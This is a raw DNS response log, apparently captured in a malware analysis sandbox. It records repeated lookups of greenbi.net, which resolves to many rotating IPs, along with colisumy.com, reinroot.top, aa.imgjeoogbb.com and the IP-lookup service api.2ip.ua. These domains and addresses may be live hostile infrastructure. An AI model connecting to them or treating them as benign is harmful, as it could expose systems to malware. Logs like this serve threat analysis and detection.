Jul 27, 2023 20:19:27.829406977 CEST	8.8.8.8	192.168.2.4	0x2fef	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.829406977 CEST	8.8.8.8	192.168.2.4	0x2fef	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.829406977 CEST	8.8.8.8	192.168.2.4	0x2fef	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.829406977 CEST	8.8.8.8	192.168.2.4	0x2fef	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.829406977 CEST	8.8.8.8	192.168.2.4	0x2fef	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.829406977 CEST	8.8.8.8	192.168.2.4	0x2fef	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.829406977 CEST	8.8.8.8	192.168.2.4	0x2fef	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:27.859672070 CEST	8.8.8.8	192.168.2.4	0xa0a1	No error (0)	aa.imgjeoogbb.com		154.221.26.108	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:28.264326096 CEST	8.8.8.8	192.168.2.4	0xc5f8	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:28.264326096 CEST	8.8.8.8	192.168.2.4	0xc5f8	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:28.264326096 CEST	8.8.8.8	192.168.2.4	0xc5f8	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:28.264326096 CEST	8.8.8.8	192.168.2.4	0xc5f8	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:28.264326096 CEST	8.8.8.8	192.168.2.4	0xc5f8	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:28.264326096 CEST	8.8.8.8	192.168.2.4	0xc5f8	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:28.264326096 CEST	8.8.8.8	192.168.2.4	0xc5f8	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:28.264326096 CEST	8.8.8.8	192.168.2.4	0xc5f8	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:28.264326096 CEST	8.8.8.8	192.168.2.4	0xc5f8	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:28.264326096 CEST	8.8.8.8	192.168.2.4	0xc5f8	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:29.663275003 CEST	8.8.8.8	192.168.2.4	0x3737	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:29.663275003 CEST	8.8.8.8	192.168.2.4	0x3737	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:29.663275003 CEST	8.8.8.8	192.168.2.4	0x3737	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:29.663275003 CEST	8.8.8.8	192.168.2.4	0x3737	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:29.663275003 CEST	8.8.8.8	192.168.2.4	0x3737	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:29.663275003 CEST	8.8.8.8	192.168.2.4	0x3737	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:29.663275003 CEST	8.8.8.8	192.168.2.4	0x3737	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:29.663275003 CEST	8.8.8.8	192.168.2.4	0x3737	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:29.663275003 CEST	8.8.8.8	192.168.2.4	0x3737	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:29.663275003 CEST	8.8.8.8	192.168.2.4	0x3737	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:30.200757027 CEST	8.8.8.8	192.168.2.4	0xf22b	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:30.200757027 CEST	8.8.8.8	192.168.2.4	0xf22b	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:30.200757027 CEST	8.8.8.8	192.168.2.4	0xf22b	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:30.200757027 CEST	8.8.8.8	192.168.2.4	0xf22b	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:30.200757027 CEST	8.8.8.8	192.168.2.4	0xf22b	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:30.200757027 CEST	8.8.8.8	192.168.2.4	0xf22b	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:30.200757027 CEST	8.8.8.8	192.168.2.4	0xf22b	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:30.200757027 CEST	8.8.8.8	192.168.2.4	0xf22b	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:30.200757027 CEST	8.8.8.8	192.168.2.4	0xf22b	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:30.200757027 CEST	8.8.8.8	192.168.2.4	0xf22b	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:32.393177032 CEST	8.8.8.8	192.168.2.4	0x639e	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:32.393177032 CEST	8.8.8.8	192.168.2.4	0x639e	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:32.393177032 CEST	8.8.8.8	192.168.2.4	0x639e	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:32.393177032 CEST	8.8.8.8	192.168.2.4	0x639e	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:32.393177032 CEST	8.8.8.8	192.168.2.4	0x639e	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:32.393177032 CEST	8.8.8.8	192.168.2.4	0x639e	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:32.393177032 CEST	8.8.8.8	192.168.2.4	0x639e	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:32.393177032 CEST	8.8.8.8	192.168.2.4	0x639e	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:32.393177032 CEST	8.8.8.8	192.168.2.4	0x639e	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:32.393177032 CEST	8.8.8.8	192.168.2.4	0x639e	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.004584074 CEST	8.8.8.8	192.168.2.4	0xf29c	No error (0)	colisumy.com		183.100.39.157	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.004584074 CEST	8.8.8.8	192.168.2.4	0xf29c	No error (0)	colisumy.com		95.86.21.52	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.004584074 CEST	8.8.8.8	192.168.2.4	0xf29c	No error (0)	colisumy.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.004584074 CEST	8.8.8.8	192.168.2.4	0xf29c	No error (0)	colisumy.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.004584074 CEST	8.8.8.8	192.168.2.4	0xf29c	No error (0)	colisumy.com		211.171.233.129	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.004584074 CEST	8.8.8.8	192.168.2.4	0xf29c	No error (0)	colisumy.com		187.204.99.218	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.004584074 CEST	8.8.8.8	192.168.2.4	0xf29c	No error (0)	colisumy.com		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.004584074 CEST	8.8.8.8	192.168.2.4	0xf29c	No error (0)	colisumy.com		189.232.51.144	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.004584074 CEST	8.8.8.8	192.168.2.4	0xf29c	No error (0)	colisumy.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.004584074 CEST	8.8.8.8	192.168.2.4	0xf29c	No error (0)	colisumy.com		115.88.24.200	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.031969070 CEST	8.8.8.8	192.168.2.4	0xa001	No error (0)	aa.imgjeoogbb.com		154.221.26.108	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.036550045 CEST	8.8.8.8	192.168.2.4	0xd820	No error (0)	shsplatform.co.uk		80.66.203.53	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.753144026 CEST	8.8.8.8	192.168.2.4	0x1b15	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.753144026 CEST	8.8.8.8	192.168.2.4	0x1b15	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.753144026 CEST	8.8.8.8	192.168.2.4	0x1b15	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.753144026 CEST	8.8.8.8	192.168.2.4	0x1b15	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.753144026 CEST	8.8.8.8	192.168.2.4	0x1b15	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.753144026 CEST	8.8.8.8	192.168.2.4	0x1b15	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.753144026 CEST	8.8.8.8	192.168.2.4	0x1b15	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.753144026 CEST	8.8.8.8	192.168.2.4	0x1b15	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.753144026 CEST	8.8.8.8	192.168.2.4	0x1b15	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.753144026 CEST	8.8.8.8	192.168.2.4	0x1b15	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:34.892431974 CEST	8.8.8.8	192.168.2.4	0xb0bb	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.238616943 CEST	8.8.8.8	192.168.2.4	0x9655	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.238616943 CEST	8.8.8.8	192.168.2.4	0x9655	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.238616943 CEST	8.8.8.8	192.168.2.4	0x9655	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.238616943 CEST	8.8.8.8	192.168.2.4	0x9655	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.238616943 CEST	8.8.8.8	192.168.2.4	0x9655	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.238616943 CEST	8.8.8.8	192.168.2.4	0x9655	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.238616943 CEST	8.8.8.8	192.168.2.4	0x9655	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.238616943 CEST	8.8.8.8	192.168.2.4	0x9655	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.238616943 CEST	8.8.8.8	192.168.2.4	0x9655	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.238616943 CEST	8.8.8.8	192.168.2.4	0x9655	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.515116930 CEST	8.8.8.8	192.168.2.4	0x66eb	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.515116930 CEST	8.8.8.8	192.168.2.4	0x66eb	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.515116930 CEST	8.8.8.8	192.168.2.4	0x66eb	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.515116930 CEST	8.8.8.8	192.168.2.4	0x66eb	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.515116930 CEST	8.8.8.8	192.168.2.4	0x66eb	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.515116930 CEST	8.8.8.8	192.168.2.4	0x66eb	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.515116930 CEST	8.8.8.8	192.168.2.4	0x66eb	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.515116930 CEST	8.8.8.8	192.168.2.4	0x66eb	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.515116930 CEST	8.8.8.8	192.168.2.4	0x66eb	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.515116930 CEST	8.8.8.8	192.168.2.4	0x66eb	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.816960096 CEST	8.8.8.8	192.168.2.4	0x797e	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.816960096 CEST	8.8.8.8	192.168.2.4	0x797e	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.816960096 CEST	8.8.8.8	192.168.2.4	0x797e	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.816960096 CEST	8.8.8.8	192.168.2.4	0x797e	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.816960096 CEST	8.8.8.8	192.168.2.4	0x797e	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.816960096 CEST	8.8.8.8	192.168.2.4	0x797e	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.816960096 CEST	8.8.8.8	192.168.2.4	0x797e	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.816960096 CEST	8.8.8.8	192.168.2.4	0x797e	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.816960096 CEST	8.8.8.8	192.168.2.4	0x797e	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:35.816960096 CEST	8.8.8.8	192.168.2.4	0x797e	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.181528091 CEST	8.8.8.8	192.168.2.4	0x5b2b	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.505924940 CEST	8.8.8.8	192.168.2.4	0x2ab	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.505924940 CEST	8.8.8.8	192.168.2.4	0x2ab	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.505924940 CEST	8.8.8.8	192.168.2.4	0x2ab	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.505924940 CEST	8.8.8.8	192.168.2.4	0x2ab	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.505924940 CEST	8.8.8.8	192.168.2.4	0x2ab	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.505924940 CEST	8.8.8.8	192.168.2.4	0x2ab	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.505924940 CEST	8.8.8.8	192.168.2.4	0x2ab	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.505924940 CEST	8.8.8.8	192.168.2.4	0x2ab	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.505924940 CEST	8.8.8.8	192.168.2.4	0x2ab	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.505924940 CEST	8.8.8.8	192.168.2.4	0x2ab	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.884725094 CEST	8.8.8.8	192.168.2.4	0xaccd	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.884725094 CEST	8.8.8.8	192.168.2.4	0xaccd	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.884725094 CEST	8.8.8.8	192.168.2.4	0xaccd	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.884725094 CEST	8.8.8.8	192.168.2.4	0xaccd	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.884725094 CEST	8.8.8.8	192.168.2.4	0xaccd	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.884725094 CEST	8.8.8.8	192.168.2.4	0xaccd	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.884725094 CEST	8.8.8.8	192.168.2.4	0xaccd	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.884725094 CEST	8.8.8.8	192.168.2.4	0xaccd	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.884725094 CEST	8.8.8.8	192.168.2.4	0xaccd	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:36.884725094 CEST	8.8.8.8	192.168.2.4	0xaccd	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.123205900 CEST	8.8.8.8	192.168.2.4	0x8ca1	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.123205900 CEST	8.8.8.8	192.168.2.4	0x8ca1	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.123205900 CEST	8.8.8.8	192.168.2.4	0x8ca1	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.123205900 CEST	8.8.8.8	192.168.2.4	0x8ca1	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.123205900 CEST	8.8.8.8	192.168.2.4	0x8ca1	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.123205900 CEST	8.8.8.8	192.168.2.4	0x8ca1	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.123205900 CEST	8.8.8.8	192.168.2.4	0x8ca1	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.123205900 CEST	8.8.8.8	192.168.2.4	0x8ca1	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.123205900 CEST	8.8.8.8	192.168.2.4	0x8ca1	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.123205900 CEST	8.8.8.8	192.168.2.4	0x8ca1	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.523566008 CEST	8.8.8.8	192.168.2.4	0x359f	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.523566008 CEST	8.8.8.8	192.168.2.4	0x359f	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.523566008 CEST	8.8.8.8	192.168.2.4	0x359f	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.523566008 CEST	8.8.8.8	192.168.2.4	0x359f	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.523566008 CEST	8.8.8.8	192.168.2.4	0x359f	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.523566008 CEST	8.8.8.8	192.168.2.4	0x359f	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.523566008 CEST	8.8.8.8	192.168.2.4	0x359f	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.523566008 CEST	8.8.8.8	192.168.2.4	0x359f	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.523566008 CEST	8.8.8.8	192.168.2.4	0x359f	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.523566008 CEST	8.8.8.8	192.168.2.4	0x359f	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.911575079 CEST	8.8.8.8	192.168.2.4	0x58ed	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.911575079 CEST	8.8.8.8	192.168.2.4	0x58ed	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.911575079 CEST	8.8.8.8	192.168.2.4	0x58ed	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.911575079 CEST	8.8.8.8	192.168.2.4	0x58ed	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.911575079 CEST	8.8.8.8	192.168.2.4	0x58ed	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.911575079 CEST	8.8.8.8	192.168.2.4	0x58ed	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.911575079 CEST	8.8.8.8	192.168.2.4	0x58ed	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.911575079 CEST	8.8.8.8	192.168.2.4	0x58ed	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.911575079 CEST	8.8.8.8	192.168.2.4	0x58ed	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:37.911575079 CEST	8.8.8.8	192.168.2.4	0x58ed	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:38.278451920 CEST	8.8.8.8	192.168.2.4	0x5f05	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:38.278451920 CEST	8.8.8.8	192.168.2.4	0x5f05	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:38.278451920 CEST	8.8.8.8	192.168.2.4	0x5f05	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:38.278451920 CEST	8.8.8.8	192.168.2.4	0x5f05	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:38.278451920 CEST	8.8.8.8	192.168.2.4	0x5f05	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:38.278451920 CEST	8.8.8.8	192.168.2.4	0x5f05	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:38.278451920 CEST	8.8.8.8	192.168.2.4	0x5f05	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:38.278451920 CEST	8.8.8.8	192.168.2.4	0x5f05	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:38.278451920 CEST	8.8.8.8	192.168.2.4	0x5f05	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:38.278451920 CEST	8.8.8.8	192.168.2.4	0x5f05	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:38.818651915 CEST	8.8.8.8	192.168.2.4	0x6106	No error (0)	reinroot.top		193.106.174.125	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:39.671905994 CEST	8.8.8.8	192.168.2.4	0x1972	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:39.671905994 CEST	8.8.8.8	192.168.2.4	0x1972	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:39.671905994 CEST	8.8.8.8	192.168.2.4	0x1972	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:39.671905994 CEST	8.8.8.8	192.168.2.4	0x1972	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:39.671905994 CEST	8.8.8.8	192.168.2.4	0x1972	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:39.671905994 CEST	8.8.8.8	192.168.2.4	0x1972	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:39.671905994 CEST	8.8.8.8	192.168.2.4	0x1972	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:39.671905994 CEST	8.8.8.8	192.168.2.4	0x1972	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:39.671905994 CEST	8.8.8.8	192.168.2.4	0x1972	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:39.671905994 CEST	8.8.8.8	192.168.2.4	0x1972	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.004160881 CEST	8.8.8.8	192.168.2.4	0x2d86	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.004160881 CEST	8.8.8.8	192.168.2.4	0x2d86	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.004160881 CEST	8.8.8.8	192.168.2.4	0x2d86	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
